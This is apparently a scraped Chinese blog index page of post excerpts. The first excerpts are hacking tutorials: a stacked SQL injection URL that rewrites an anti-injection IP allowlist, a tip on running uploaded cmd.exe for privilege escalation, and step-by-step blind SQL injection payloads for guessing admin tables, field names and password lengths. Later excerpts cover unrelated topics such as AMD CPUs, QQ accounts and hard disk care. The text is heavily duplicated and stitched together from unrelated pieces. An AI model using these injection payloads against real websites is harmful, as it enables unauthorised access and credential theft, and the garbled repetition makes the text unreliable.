貌似现在Cookies注入 十分的流行
原因是在防注入系统下还是可以用cookies欺骗和注入获得我们想要的可爱的信息..
------------------
防注入系统:设置ip限制.
可以用:
进入IP数据库,接下来我们来执行下update
http://www.XXXXX.com/qipao/qp1.asp?sid=1&MemberID=8*22;update promiseIPsetIpAddress='58.82.*.94' where IpAddress='121.32.*.206'—
[b][color=#0000ff]绕过
说到这里,我想也可以用Vpn突破限制的..
原因是在防注入系统下还是可以用cookies欺骗和注入获得我们想要的可爱的信息..
------------------
防注入系统:设置ip限制.
可以用:
进入IP数据库,接下来我们来执行下update
http://www.XXXXX.com/qipao/qp1.asp?sid=1&MemberID=8*22;update promiseIPsetIpAddress='58.82.*.94' where IpAddress='121.32.*.206'—
[b][color=#0000ff]绕过
说到这里,我想也可以用Vpn突破限制的..
>>阅读全文
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
>>阅读全文
.判断有无注入点
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*) >0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
; and 1=1 and 1=2
2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
and 1=(select count(*) from admin where len(*) >0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
and 1=(select count(*) from admin where len(name)=6) 正确
and 1=(select count(*) from admin where len(password)>11) 正确
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
>>阅读全文
“龙”,曾经代表的是帝王级,在中国文化里倍受尊崇。顺应文化,AMD在国内发布的处理器也多以“龙”系列为主,闪龙、速龙再到羿龙,虽有攀龙附凤之嫌,但也可以理解AMD的良好愿望。
只可惜,这些“龙子龙孙”似乎都不太争气,没有一款具有帝王之相,顶多都是些“地头蛇”。AMD千年老二之宿命,一年又一年无奈地上演着。本周,有条“龙”算是飞黄腾达了,本该扬眉吐气的AMD,这回子却很紧张,沉默、向主板厂商施压、威胁……
这条闯祸的“龙”,正是AMD正全力推销的采用45纳米制造工艺的Phenom II X3三核处理器。上市之初,大家就在推测这是一款由4核屏蔽而来的产品,毕竟为三核产品再开生产线是有悖企业利润最大化理念的。只是没想到,怀疑这么快就得到证实,来得如此突然、实现4核如此简单,真到现在我都觉得是AMD太轻视玩家的创造力?还是玩家太聪明?
只可惜,这些“龙子龙孙”似乎都不太争气,没有一款具有帝王之相,顶多都是些“地头蛇”。AMD千年老二之宿命,一年又一年无奈地上演着。本周,有条“龙”算是飞黄腾达了,本该扬眉吐气的AMD,这回子却很紧张,沉默、向主板厂商施压、威胁……
这条闯祸的“龙”,正是AMD正全力推销的采用45纳米制造工艺的Phenom II X3三核处理器。上市之初,大家就在推测这是一款由4核屏蔽而来的产品,毕竟为三核产品再开生产线是有悖企业利润最大化理念的。只是没想到,怀疑这么快就得到证实,来得如此突然、实现4核如此简单,真到现在我都觉得是AMD太轻视玩家的创造力?还是玩家太聪明?
>>阅读全文
光绘涂鸦就是对光摄影的一次很好学习。关于对光的研究,现在有很多玩家,拍摄了许多令人迷幻的作品。
光绘摄影是在没有自然光源的情况下,作者发挥自己的想象,用人造光源的手段来改变物体的本来色彩、面貌,以达到抒发作者思想、情感。
光绘摄影是在没有自然光源的情况下,作者发挥自己的想象,用人造光源的手段来改变物体的本来色彩、面貌,以达到抒发作者思想、情感。
>>阅读全文
以下文字将分两部分来进行讨论,分别是QQ号码丢失的原因,如何才能找回您的QQ号码,请您详细阅读。期间会牵扯到盗号者,客服,以及丢失QQ号码的您,如果我的言辞您觉得有点偏激,还请诸位谅解,不要骂街!
一、QQ号码丢失的原因
1、由于个人原因,好久没有上QQ,某天登陆突然发现密码不对,然后通过查找发现自己QQ的信息全部都没了,包括申请的业务也没了,为什么会这样啊?
首先“恭喜”您,由于您的QQ是普通号码,在连续3个月不登陆的情况下,被腾讯公司自动收回了,也就意味着这个QQ号码从此再也不属于您了,会员号码是不会被收回的,要想不被收回,赶紧升级会员把,这也是腾讯公司的收入之一,因为天下没有免费的午餐。
2、如果我的QQ号码是被回收了,为什么我的30级的好号被收回了,而我一年多没用的垃圾号码现在仍然可以登陆,难道腾讯只回收好号,垃圾号不管?
首先我想大家都有一个共识,好号应该是位数短,容易记,而垃圾号呢,肯定是死长死难记的那种。大家做个简单试验,随便找个文件夹,打开,然后选自动排列,接下来观察一下,发现什么规律么?电脑是按0~9,A~Z的规律来进行排列的,说简单点就是从小到大排列,由于回收工作肯定是由服务器自动处理的,所以在处理的同时肯定也把所有号码从小到大排列,(QQ好友管理器的排列方式也是这样的),一个号码一个号码的检查,正常登陆就过,连续3个月未登陆就回收,试想一下这台回收服务器每秒扫描100个号码,1个月循环一次,大家用计算器算一下,多长时间会扫描到您的好号,多长时间会扫描到您的垃圾号呢。所以,要想保护好您的好号,要么申请会员,要么保证每月登陆一次把。
一、QQ号码丢失的原因
1、由于个人原因,好久没有上QQ,某天登陆突然发现密码不对,然后通过查找发现自己QQ的信息全部都没了,包括申请的业务也没了,为什么会这样啊?
首先“恭喜”您,由于您的QQ是普通号码,在连续3个月不登陆的情况下,被腾讯公司自动收回了,也就意味着这个QQ号码从此再也不属于您了,会员号码是不会被收回的,要想不被收回,赶紧升级会员把,这也是腾讯公司的收入之一,因为天下没有免费的午餐。
2、如果我的QQ号码是被回收了,为什么我的30级的好号被收回了,而我一年多没用的垃圾号码现在仍然可以登陆,难道腾讯只回收好号,垃圾号不管?
首先我想大家都有一个共识,好号应该是位数短,容易记,而垃圾号呢,肯定是死长死难记的那种。大家做个简单试验,随便找个文件夹,打开,然后选自动排列,接下来观察一下,发现什么规律么?电脑是按0~9,A~Z的规律来进行排列的,说简单点就是从小到大排列,由于回收工作肯定是由服务器自动处理的,所以在处理的同时肯定也把所有号码从小到大排列,(QQ好友管理器的排列方式也是这样的),一个号码一个号码的检查,正常登陆就过,连续3个月未登陆就回收,试想一下这台回收服务器每秒扫描100个号码,1个月循环一次,大家用计算器算一下,多长时间会扫描到您的好号,多长时间会扫描到您的垃圾号呢。所以,要想保护好您的好号,要么申请会员,要么保证每月登陆一次把。
>>阅读全文
硬盘是计算机中最重要的存储介质,关于硬盘的维护保养,相信每个电脑用户都有所了解。不过,以前的很多文章都是针对拨号时代的单机用户,在宽带逐渐普及、大硬盘不断降价的今天,很多人一打开电脑就会让硬盘满负荷运转:看高清晰的DVDRip影片、进行不间断的BT下载、使用Windows的系统还原功能……
不过,你可能并不清楚,这些新软件带来的新的应用模式,会给硬盘带来新的伤害!新应用模式带来的隐患。
1. 频繁地整理磁盘碎片
磁盘碎片整理和系统还原本来是Windows提供的正常功能,不过如果你频繁地做这些操作,对硬盘是有害无利的。磁盘整理要对硬盘进行底层分析,判断哪些数据可以移动、哪些数据不可以移动,再对文件进行分类排序。在正式安排好硬盘数据结构前,它不断随机读取写入数据到其他簇,排好顺序后再把数据移回适当位置,这些操作都会占用大量的CPU和磁盘资源。
其实,对现在的大硬盘而言 ,文档和邮件占用的空间比例非常小,多数人买大硬盘是用来装电影和音乐的,这些分区根本无需频繁整理??因为播放多媒体文件的效 果和磁盘结构根本没有关系,播放速度是由显卡和CPU决定的。
2. Windows XP的自动重启
Windows XP的自动重启功能可以自动关闭无响应的进程,自动退出非法操作的程序,从而减少用户的操作步骤。不过,这个功能也有一个很大的问题:它会在自动重新启动前关闭硬盘电源,在重新启动机器的时候再打开硬盘电源!这样一来,硬盘在不到10秒的时间间隔内,受到电流两次冲击,很可能会发生突然“死亡”的故障。为了节省一些能源设置成让系统自动关闭硬盘,对硬盘来说也是弊大于利的。
不过,你可能并不清楚,这些新软件带来的新的应用模式,会给硬盘带来新的伤害!新应用模式带来的隐患。
1. 频繁地整理磁盘碎片
磁盘碎片整理和系统还原本来是Windows提供的正常功能,不过如果你频繁地做这些操作,对硬盘是有害无利的。磁盘整理要对硬盘进行底层分析,判断哪些数据可以移动、哪些数据不可以移动,再对文件进行分类排序。在正式安排好硬盘数据结构前,它不断随机读取写入数据到其他簇,排好顺序后再把数据移回适当位置,这些操作都会占用大量的CPU和磁盘资源。
其实,对现在的大硬盘而言 ,文档和邮件占用的空间比例非常小,多数人买大硬盘是用来装电影和音乐的,这些分区根本无需频繁整理??因为播放多媒体文件的效 果和磁盘结构根本没有关系,播放速度是由显卡和CPU决定的。
2. Windows XP的自动重启
Windows XP的自动重启功能可以自动关闭无响应的进程,自动退出非法操作的程序,从而减少用户的操作步骤。不过,这个功能也有一个很大的问题:它会在自动重新启动前关闭硬盘电源,在重新启动机器的时候再打开硬盘电源!这样一来,硬盘在不到10秒的时间间隔内,受到电流两次冲击,很可能会发生突然“死亡”的故障。为了节省一些能源设置成让系统自动关闭硬盘,对硬盘来说也是弊大于利的。
>>阅读全文
为了有效地保存硬盘中的数据,除了经常性地进行备份工作以外,还要学会在硬盘出现故障时如何救活硬盘,或者从坏的区域中提取出有用的数据,把损失降到最小程度。
系统不认硬盘
系统从硬盘无法启动,从A盘启动也无法进入C盘,使用CMOS中的自动监测功能也无法
发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上,硬盘本身故障的可能性不大,可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验,就会很快发现故障的所在。如果新接上的硬盘也不被接受,一个常见的原因就是硬盘上的主从跳线,如果一条IDE硬盘线上接两个硬盘设备,就要分清楚主从关系。
CMOS引起的故障
CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能,可自动检测硬盘的类型。当硬盘类型错误时,有时干脆无法启动系统,有时能够启动,但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量,则硬盘后面的扇区将无法读写,如果是多分区状态则个别分区将丢失。还有一个重要的故障原因,由于目前的IDE都支持逻辑参数类型,硬盘可采用“Normal,LBA,Large”等,如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式,则会发生硬盘的读写错误故障,因为其映射关系已经改变,将无法读取原来的正确硬盘位置。
系统不认硬盘
系统从硬盘无法启动,从A盘启动也无法进入C盘,使用CMOS中的自动监测功能也无法
发现硬盘的存在。这种故障大都出现在连接电缆或IDE端口上,硬盘本身故障的可能性不大,可通过重新插接硬盘电缆或者改换IDE口及电缆等进行替换试验,就会很快发现故障的所在。如果新接上的硬盘也不被接受,一个常见的原因就是硬盘上的主从跳线,如果一条IDE硬盘线上接两个硬盘设备,就要分清楚主从关系。
CMOS引起的故障
CMOS中的硬盘类型正确与否直接影响硬盘的正常使用。现在的机器都支持“IDE Auto Detect”的功能,可自动检测硬盘的类型。当硬盘类型错误时,有时干脆无法启动系统,有时能够启动,但会发生读写错误。比如CMOS中的硬盘类型小于实际的硬盘容量,则硬盘后面的扇区将无法读写,如果是多分区状态则个别分区将丢失。还有一个重要的故障原因,由于目前的IDE都支持逻辑参数类型,硬盘可采用“Normal,LBA,Large”等,如果在一般的模式下安装了数据,而又在CMOS中改为其它的模式,则会发生硬盘的读写错误故障,因为其映射关系已经改变,将无法读取原来的正确硬盘位置。
>>阅读全文
